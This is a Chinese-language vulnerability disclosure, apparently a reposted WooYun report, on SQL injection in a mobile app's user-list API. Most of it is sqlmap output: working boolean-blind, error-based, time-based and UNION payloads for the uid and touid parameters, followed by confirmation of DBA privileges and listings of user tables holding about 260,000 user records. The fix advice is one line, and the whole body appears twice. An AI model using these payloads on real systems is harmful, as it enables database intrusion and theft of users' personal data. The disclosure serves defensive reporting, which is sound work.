记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

APP安全之疯点多处SQL注射打包(影响20W+用户信息/可UNION)

2016-07-11 14:35

http://**.**.**.**/index.php/space/getulist?&uid=1800821&sinceuid=1&touid=180082



全部的uid和touid参数都存在注入



就不一一列出来,我讨厌分开刷的人



code 区域
sqlmap resumed the following injection point(s) from stored session:

---

Parameter: uid (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)

Payload: &uid=1800821 OR NOT 7662=7662#&sinceuid=1&touid=180082



Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: &uid=1800821 AND (SELECT 1225 FROM(SELECT COUNT(*),CONCAT(0x717a6b6a71,(SELECT (ELT(1225=1225,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sinceuid=1&touid=180082



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: &uid=1800821 AND (SELECT * FROM (SELECT(SLEEP(5)))kfKj)&sinceuid=1&touid=180082



Type: UNION query

Title: Generic UNION query (NULL) - 9 columns

Payload: &uid=-1520 UNION ALL SELECT CONCAT(0x717a6b6a71,0x45594f4a4a637645695a7051785163597264736c6274486d6a6b794c6e5641697843494f6c4c7948,0x716a707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&sinceuid=1&touid=180082



Parameter: touid (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)

Payload: &uid=1800821&sinceuid=1&touid=180082 OR NOT 5492=5492#



Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: &uid=1800821&sinceuid=1&touid=180082 AND (SELECT 2428 FROM(SELECT COUNT(*),CONCAT(0x717a6b6a71,(SELECT (ELT(2428=2428,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: &uid=1800821&sinceuid=1&touid=180082 AND (SELECT * FROM (SELECT(SLEEP(5)))SueD)



Type: UNION query

Title: Generic UNION query (19) - 9 columns

Payload: &uid=1800821&sinceuid=1&touid=-5005 UNION ALL SELECT CONCAT(0x717a6b6a71,0x7a656458457249687a745455534d464c626b6c734574475a424653446363746b466350614c727950,0x716a707071),19,19,19,19,19,19,19,19-- -

---



1.png



dba权限

2.png



某个库两万多张表

3.png



code 区域
Database: aa_base 

这个表是26w用户?

+--------------------+---------+

| Table | Entries |

+--------------------+---------+

| `action` | 891848 |

| score | 675673 |

| communication | 315581 |

| appointment_note | 308701 |

| user_base | 268956 |

| user_info | 268742 |

| user_base_20150301 | 194735 |

| user_point | 158287 |

| topic_visit | 109661 |

| user_pic | 93542 |

| user_bw_list | 80353 |

| addfriend | 75739 |

| pushrecord | 54882 |

| interview | 47049 |

| user_third | 30517 |

| android_token | 26948 |

| user_hot_fix | 23683 |

| web_user | 20963 |

| push_msg_his | 20489 |

| contact | 18338 |

| game_vote | 17183 |

| user_avtar_his | 14715 |

| ios_token | 11964 |

| user_photo | 8353 |

| wallet | 6177 |

| ios_token_copy | 4691 |

| addfriend1 | 3193 |

| schoolesite | 2845 |

| label | 819 |

| wechat_result | 536 |

| answer | 414 |

| fx38 | 408 |

| talk_ams | 306 |

| school_info | 305 |

| music_yx_ip | 267 |

| gbox_ams | 204 |

| game_vote_virtual | 188 |

| activity | 183 |

| question | 176 |

| wechat_game | 147 |

| memory_log | 144 |

| appointment | 93 |

| music_yx | 88 |

| tmpp | 83 |

| sp | 69 |

| android_token_copy | 68 |

| question_copy | 63 |

| media_mark | 46 |

| news | 17 |

| temp | 17 |

| adplace | 15 |

| community | 15 |

| user_shangjia | 13 |

| user_dating | 9 |

| notes | 8 |

| fun_news | 6 |

| dsft_list | 5 |

| label_type | 4 |

| question_bank | 4 |

| user_admin | 4 |

| com_submit | 3 |

| report | 3 |

| sms | 3 |

| scene_ams | 2 |

| bg_img | 1 |

| crazy_ams | 1 |

| game | 1 |

| user_operator | 1 |

| userid_count | 1 |

+--------------------+---------+



这样是不是就算跨裤了

code 区域
Database: aa_topic                                                             

+-------------------+---------+

| Table | Entries |

+-------------------+---------+

| affiliate | 282635 |

| comment_t | 168895 |

| blog_t | 89685 |

| attitude_t | 89521 |

| analyze_x | 54121 |

| attention | 49738 |

| uids | 25812 |

| attitude_t_copy | 21956 |

| guide | 5350 |

| blogpagev | 1453 |

| collect_t_index | 852 |

| interview | 687 |

| collect_t | 553 |

| topic | 404 |

| topic1 | 360 |

| topic_config | 350 |

| subordinatedclass | 283 |

| blog_attention | 106 |

| award_list | 47 |

| t_blog_tag | 46 |

| rotate | 24 |

| chatroom | 6 |

| shield | 3 |

+-------------------+---------+



话说真的有700w用户吗?表太多就没有跑完



漏洞证明:

http://**.**.**.**/index.php/space/getulist?&uid=1800821&sinceuid=1&touid=180082



全部的uid和touid参数都存在注入



就不一一列出来,我讨厌分开刷的人



code 区域
sqlmap resumed the following injection point(s) from stored session:

---

Parameter: uid (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)

Payload: &uid=1800821 OR NOT 7662=7662#&sinceuid=1&touid=180082



Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: &uid=1800821 AND (SELECT 1225 FROM(SELECT COUNT(*),CONCAT(0x717a6b6a71,(SELECT (ELT(1225=1225,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sinceuid=1&touid=180082



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: &uid=1800821 AND (SELECT * FROM (SELECT(SLEEP(5)))kfKj)&sinceuid=1&touid=180082



Type: UNION query

Title: Generic UNION query (NULL) - 9 columns

Payload: &uid=-1520 UNION ALL SELECT CONCAT(0x717a6b6a71,0x45594f4a4a637645695a7051785163597264736c6274486d6a6b794c6e5641697843494f6c4c7948,0x716a707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&sinceuid=1&touid=180082



Parameter: touid (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)

Payload: &uid=1800821&sinceuid=1&touid=180082 OR NOT 5492=5492#



Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: &uid=1800821&sinceuid=1&touid=180082 AND (SELECT 2428 FROM(SELECT COUNT(*),CONCAT(0x717a6b6a71,(SELECT (ELT(2428=2428,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: &uid=1800821&sinceuid=1&touid=180082 AND (SELECT * FROM (SELECT(SLEEP(5)))SueD)



Type: UNION query

Title: Generic UNION query (19) - 9 columns

Payload: &uid=1800821&sinceuid=1&touid=-5005 UNION ALL SELECT CONCAT(0x717a6b6a71,0x7a656458457249687a745455534d464c626b6c734574475a424653446363746b466350614c727950,0x716a707071),19,19,19,19,19,19,19,19-- -

---



1.png



dba权限

2.png



某个库两万多张表

3.png



code 区域
Database: aa_base 

这个表是26w用户?

+--------------------+---------+

| Table | Entries |

+--------------------+---------+

| `action` | 891848 |

| score | 675673 |

| communication | 315581 |

| appointment_note | 308701 |

| user_base | 268956 |

| user_info | 268742 |

| user_base_20150301 | 194735 |

| user_point | 158287 |

| topic_visit | 109661 |

| user_pic | 93542 |

| user_bw_list | 80353 |

| addfriend | 75739 |

| pushrecord | 54882 |

| interview | 47049 |

| user_third | 30517 |

| android_token | 26948 |

| user_hot_fix | 23683 |

| web_user | 20963 |

| push_msg_his | 20489 |

| contact | 18338 |

| game_vote | 17183 |

| user_avtar_his | 14715 |

| ios_token | 11964 |

| user_photo | 8353 |

| wallet | 6177 |

| ios_token_copy | 4691 |

| addfriend1 | 3193 |

| schoolesite | 2845 |

| label | 819 |

| wechat_result | 536 |

| answer | 414 |

| fx38 | 408 |

| talk_ams | 306 |

| school_info | 305 |

| music_yx_ip | 267 |

| gbox_ams | 204 |

| game_vote_virtual | 188 |

| activity | 183 |

| question | 176 |

| wechat_game | 147 |

| memory_log | 144 |

| appointment | 93 |

| music_yx | 88 |

| tmpp | 83 |

| sp | 69 |

| android_token_copy | 68 |

| question_copy | 63 |

| media_mark | 46 |

| news | 17 |

| temp | 17 |

| adplace | 15 |

| community | 15 |

| user_shangjia | 13 |

| user_dating | 9 |

| notes | 8 |

| fun_news | 6 |

| dsft_list | 5 |

| label_type | 4 |

| question_bank | 4 |

| user_admin | 4 |

| com_submit | 3 |

| report | 3 |

| sms | 3 |

| scene_ams | 2 |

| bg_img | 1 |

| crazy_ams | 1 |

| game | 1 |

| user_operator | 1 |

| userid_count | 1 |

+--------------------+---------+



这样是不是就算跨裤了

code 区域
Database: aa_topic                                                             

+-------------------+---------+

| Table | Entries |

+-------------------+---------+

| affiliate | 282635 |

| comment_t | 168895 |

| blog_t | 89685 |

| attitude_t | 89521 |

| analyze_x | 54121 |

| attention | 49738 |

| uids | 25812 |

| attitude_t_copy | 21956 |

| guide | 5350 |

| blogpagev | 1453 |

| collect_t_index | 852 |

| interview | 687 |

| collect_t | 553 |

| topic | 404 |

| topic1 | 360 |

| topic_config | 350 |

| subordinatedclass | 283 |

| blog_attention | 106 |

| award_list | 47 |

| t_blog_tag | 46 |

| rotate | 24 |

| chatroom | 6 |

| shield | 3 |

+-------------------+---------+



话说真的有700w用户吗?表太多就没有跑完

修复方案:

话说真的有700w用户吗?建议全部排查下参数,不要指哪补哪,这是不正确的选择!

话说有没有小礼物相送啊,经常看到别人晒礼物,羡慕的要死!

知识来源: www.wooyun.org/bugs/wooyun-2016-0211863

阅读:93179 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“APP安全之疯点多处SQL注射打包(影响20W+用户信息/可UNION)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词